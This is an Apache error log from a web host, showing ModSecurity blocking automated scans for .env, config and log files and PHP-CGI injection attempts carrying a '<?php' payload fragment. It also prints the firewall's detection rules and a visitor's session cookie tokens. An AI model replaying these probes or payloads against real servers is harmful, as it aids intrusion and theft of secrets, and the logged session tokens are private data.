[hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aRIP_ywklNu1D6UQIGMqtQAAANE"], referer: https://clickstarpics.com//wp-login.php [Wed Nov 12 21:32:02.396648 2025] [:error] [pid 32411:tid 32480] [client 4.217.221.186:11101] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sun Nov 16 23:36:25.311471 2025] [:error] [pid 5961:tid 5976] [client 74.176.64.167:62063] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Tue Nov 25 18:10:36.952689 2025] [:error] [pid 17579:tid 17605] [client 20.249.10.99:20454] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/install.php [Tue Nov 25 18:10:57.534200 2025] [:error] [pid 24320:tid 24332] [client 20.249.10.99:20369] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/myip.php [Tue Nov 25 18:14:05.057602 2025] [:error] [pid 17408:tid 17496] [client 20.249.10.99:20302] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Sat Nov 29 00:54:14.093437 2025] [:error] [pid 5933:tid 5988] [client 164.90.228.79:57856] [client 164.90.228.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aSooFu_dPJ-Q-bTs_F6P_wAAAVc"] [Sat Nov 29 00:54:19.364118 2025] [authz_core:error] [pid 6946:tid 6967] [client 164.90.228.79:57904] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Sat Nov 29 04:46:13.108439 2025] [access_compat:error] [pid 8334:tid 8437] [client 18.183.158.174:37724] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Sat Nov 29 04:46:13.108449 2025] [access_compat:error] [pid 8509:tid 8527] [client 18.183.158.174:37130] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Sat Nov 29 04:46:27.524006 2025] [:error] [pid 8509:tid 8531] [client 18.183.158.174:46490] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app.config"] [unique_id "aSpeg8zf1XASq3fPYsYG-wAAANQ"] [Sat Nov 29 04:46:27.997133 2025] [:error] [pid 8332:tid 8416] [client 18.183.158.174:46844] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aSpeg7JrfWjqSVAxu4l9zQAAAFU"] [Sat Nov 29 04:46:29.089177 2025] [:error] [pid 8332:tid 8421] [client 18.183.158.174:47638] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.config"] [unique_id "aSpehbJrfWjqSVAxu4l90QAAAFc"] [Sat Nov 29 04:46:47.595826 2025] [:error] [pid 8332:tid 8392] [client 18.183.158.174:54784] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aSpel7JrfWjqSVAxu4l98gAAAEQ"] [Sat Nov 29 04:46:47.596526 2025] [:error] [pid 8332:tid 8399] [client 18.183.158.174:54956] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aSpel7JrfWjqSVAxu4l98wAAAEs"] [Sat Nov 29 04:46:47.597381 2025] [:error] [pid 8330:tid 8366] [client 18.183.158.174:54660] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aSpelxIBYkE-PEbfyV5nqgAAAAU"] [Sat Nov 29 04:46:48.865736 2025] [:error] [pid 8509:tid 8515] [client 18.183.158.174:55044] [client 18.183.158.174] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aSpemMzf1XASq3fPYsYHVgAAAMQ"] [Sat Nov 29 11:18:08.130785 2025] [access_compat:error] [pid 8509:tid 8535] [client 35.182.249.225:53320] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/.env [Sat Nov 29 11:18:08.725743 2025] [access_compat:error] [pid 8334:tid 8417] [client 35.182.249.225:53538] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/app/.env [Sat Nov 29 11:18:09.083741 2025] [access_compat:error] [pid 8509:tid 8528] [client 35.182.249.225:53804] AH01797: client denied by server configuration: /home/id/cms.dev-unit.com/core/Datavase [Sat Nov 29 11:18:27.064669 2025] [:error] [pid 8509:tid 8511] [client 35.182.249.225:33494] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/app.config"] [unique_id "aSq6Y8zf1XASq3fPYsb4ZAAAAMA"] [Sat Nov 29 11:18:28.461321 2025] [:error] [pid 8332:tid 8402] [client 35.182.249.225:33918] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/web.config"] [unique_id "aSq6ZLJrfWjqSVAxu4nv6gAAAE0"] [Sat Nov 29 11:18:29.815402 2025] [:error] [pid 8334:tid 8406] [client 35.182.249.225:34484] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".config"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/.config"] [unique_id "aSq6ZRJOmErLa-kY3lf9dgAAAIA"] [Sat Nov 29 11:18:59.278297 2025] [:error] [pid 8334:tid 8406] [client 35.182.249.225:48680] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/error.log"] [unique_id "aSq6gxJOmErLa-kY3lf9ywAAAIA"] [Sat Nov 29 11:18:59.279394 2025] [:error] [pid 8509:tid 8524] [client 35.182.249.225:48678] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/debug.log"] [unique_id "aSq6g8zf1XASq3fPYsb4owAAAM0"] [Sat Nov 29 11:18:59.670951 2025] [:error] [pid 8509:tid 8525] [client 35.182.249.225:49152] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/php_error.log"] [unique_id "aSq6g8zf1XASq3fPYsb4pQAAAM4"] [Sat Nov 29 11:18:59.671632 2025] [:error] [pid 8509:tid 8513] [client 35.182.249.225:48934] [client 35.182.249.225] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/errors.log"] [unique_id "aSq6g8zf1XASq3fPYsb4pgAAAMI"] [Sat Nov 29 17:27:32.318636 2025] [:error] [pid 8334:tid 8438] [client 43.207.152.34:48370] [client 43.207.152.34] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms.dev-unit.com"] [uri "/config.ini"] [unique_id "aSsQ5BJOmErLa-kY3lcnMwAAAJU"] [Sat Nov 29 17:31:03.895928 2025] [:error] [pid 8334:tid 8412] [client 195.178.110.201:55176] [client 195.178.110.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:handl_landing_page. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within REQUEST_COOKIES:handl_landing_page: https://livebh.com/apartments/captains-landing-apartments/?utm_medium=redirect&utm_campaign=vanity&original_referrer=https://captainslandingapts.com"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aSsRtxJOmErLa-kY3lcnggAAAII"] [Sun Nov 30 09:49:50.017277 2025] [:error] [pid 21497:tid 21547] [client 158.51.121.183:46826] [client 158.51.121.183] ModSecurity: Access denied with code 403 (phase 2). Found 30 byte(s) in ARGS:_path outside range: 1-255. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "534"] [id "960901"] [rev "2"] [msg "Invalid character in request"] [severity "ERROR"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "cms.dev-unit.com"] [uri "/_fragment"] [unique_id "aSv3HnD9e9KMmdYu_RCNtwAAAZU"] [Mon Dec 01 18:05:33.565963 2025] [:error] [pid 4179:tid 4273] [client 147.182.254.163:57548] [client 147.182.254.163] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){8,}" at REQUEST_COOKIES:CFGLOBALS. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "157"] [id "981172"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: - found within REQUEST_COOKIES:CFGLOBALS: urltoken=CFID#=447305288&CFTOKEN#=c31320631a0d1609-8548C213-EB88-5E83-3FB8D7175BABBA06&jsessionid#=0C44ABA4033ED80F5F37CD05CA7961F9.cfusion#lastvisit={ts '2025-12-01 08:36:17'}#hitcount=2#timecreated={ts '2025-12-01 08:36:16'}#cftoken=c31320631a0d1609-8548C213-EB88-5E83-3FB8D7175BABBA06#cfid=447305288#"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "cms.dev-unit.com"] [uri "/"] [unique_id "aS28zZB_lWgrXQ3xWkEDLQAAAQo"], referer: https://www.cleaningsanfrancisco.com//wp-login.php [Mon Dec 01 18:12:41.862258 2025] [:error] [pid 31546:tid 31566] [client 48.210.70.5:10229] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Wed Dec 03 22:50:39.467960 2025] [:error] [pid 20412:tid 20424] [client 165.22.34.189:44700] [client 165.22.34.189] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTCinzaN5y-yuajOnDobTQAAAQk"] [Wed Dec 03 22:50:41.542903 2025] [:error] [pid 31876:tid 31996] [client 147.182.200.94:55556] [client 147.182.200.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php $env["USERNAME"] . [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "cms.dev-unit.com"] [uri "/php-cgi/php-cgi.exe"] [unique_id "aTCioclX2eRobly9P_Q_8QAAAIw"] [Wed Dec 03 22:50:47.507829 2025] [authz_core:error] [pid 20412:tid 20428] [client 165.22.34.189:59878] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Wed Dec 03 22:50:49.630226 2025] [authz_core:error] [pid 31874:tid 31971] [client 147.182.200.94:43574] AH01630: client denied by server configuration: /home/id/cms.dev-unit.com/server-status [Fri Dec 05 01:31:05.089887 2025] [:error] [pid 14163:tid 14185] [client 54.255.245.214:45304] [client 54.255.245.214] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] 